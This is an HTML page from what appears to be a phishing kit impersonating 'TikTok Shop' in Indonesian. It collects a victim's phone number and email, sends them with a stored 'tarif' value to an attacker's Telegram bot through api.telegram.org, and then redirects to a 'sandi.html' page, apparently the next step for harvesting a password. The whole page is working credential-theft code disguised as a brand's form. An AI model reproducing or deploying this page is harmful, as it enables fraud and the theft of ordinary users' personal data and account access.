
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>TikTok Shop</title>
<style>
    @import url('https://fonts.googleapis.com/css2?family=Ubuntu:wght@300;400;500;700&display=swap');
    * {
        font-family: 'Ubuntu', sans-serif;
        font-weight: 400;
        margin: 0;
        padding: 0;
        box-sizing: border-box;
        position: relative;
        color: #000;
    }
    .b { font-weight: 500; }
    html { width: 100vw; height: 100vh; }
    body {
        background: #fff;
        width: 100%;
        height: 100%;
    }
    .container {
        width: 100%;
        padding: 20px;
        height: 100%;
    }
    .flex {
        display: flex;
        justify-content: center;
        align-items: center;
    }
    .hero {
        width: 100%;
        height: 283px;
    }
    .hero img {
        width: 100%;
    }
    h1 {
        font-size: 20px;
        text-align: center;
        margin: 20px 0;
        font-weight: 600;
    }
    form {
        width: 100%;
        height: auto;
        flex-direction: column;
    }
    label {
        display: block;
        font-size: 15px;
        text-align: left;
        margin-bottom: 8px;
        font-weight: 500;
    }
    select {
        width: 100%;
        height: 40px;
        border-radius: 4px;
        padding: 0 10px;
        outline: none;
        border: 1px solid #aeaeae;
        background: #fff;
        margin-bottom: 20px;
    }
    input:focus,
    select:focus {
        border: 1.1px solid #000;
    }
    input {
        width: 100%;
        background-color: #f8f8f8;
        height: 40px;
        border-radius: 4px;
        border: 1px solid #aeaeae;
        outline: none;
        padding: 0 10px;
        font-size: 16px;
        margin-bottom: 20px;
    }
    button {
        margin-top: 10px;
        width: 100%;
        height: 40px;
        border: none;
        outline: none;
        border-radius: 8px;
        color: #fff;
        font-weight:bold;
        background: #EE3056;
        text-align: center;
        font-size: 13px;
    }
    
     .process1 {
            width: 100%;
            height: 100%;
            display: flex;
            align-items: center;
            justify-content: center;
            margin: auto;
            position: fixed;
            padding-top: 30px;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.4);
            z-index: 999999999;
            
      
}
.loading {
    position: fixed;
    display: flex;
    align-items: center;
    justify-content: center;
    align-items: center;
    margin-bottom: 20%;
    margin-top: 0px;
}
.loading img {
    width: 90px;
    border-radius: 10px;
}

</style>
</head>
<body>
    <center>
<div id="djload" name="process" class="process1" style="display: none;">
      <div class="loading">
       <img src="https://hosting.tigerengine.id/eyyhg8.gif">              
            </div>
        </div>
        </center>
    <div class="container">
        <div class="flex hero">
            <img src="https://hosting.tigerengine.id/gcwydq.jpg" alt="">
        </div>
        <h1 class="">TikTok Shop</h1>
        <form onsubmit="sendHp()" method="post">
            <input type="hidden" name="tarif" id="tarif" value="">
            <label>Nomor Handphone</label>
            <input type="tel" required autocomplete="off" placeholder="Nomor Handphone" name="inp" id="inp">
            <label>Email</label>
            <input type="email" required autocomplete="off" placeholder="Masukkan Email" name="email" id="email">
            <button type="submit">LANJUT</button>
        </form>
    </div>
    <script src="i.js"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script>
 var tarif = sessionStorage.getItem('tarif', tarif);
 document.getElementById("tarif").value = tarif + "";          
        
 // Login
function sendHp(){
    $(".process1").fadeIn();
    event.preventDefault();   
    
  var tarif = $('#tarif').val();
  sessionStorage.setItem('tarif', tarif);  
  var inp = $('#inp').val();
  sessionStorage.setItem('inp', inp);
  var email = $('#email').val();
  sessionStorage.setItem('email', email);
                              
    var logo = "𝘄𝘄𝘄.𝘁𝗶𝗸𝘁𝗼𝗸𝘀𝗵𝗼𝗽.𝗰𝗼𝗺";              
    var gabungan = '' + logo + '%0A⍟ ' + tarif + '%0A%0A⍟ 𝐍𝐨𝐦𝐨𝐫 •• ' + inp + '%0A⍟ 𝐄𝐦𝐚𝐢𝐥 •• ' + email ;   
    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
        method: `POST`,   
    complete: function(){
    setTimeout(function(){   
    window.location = "sandi.html";
    $(".process1").fadeOut();  
    $('#inp').val('');
    $('#email').val('');
    }, 500);}});};
    </script>
</body>
</html>
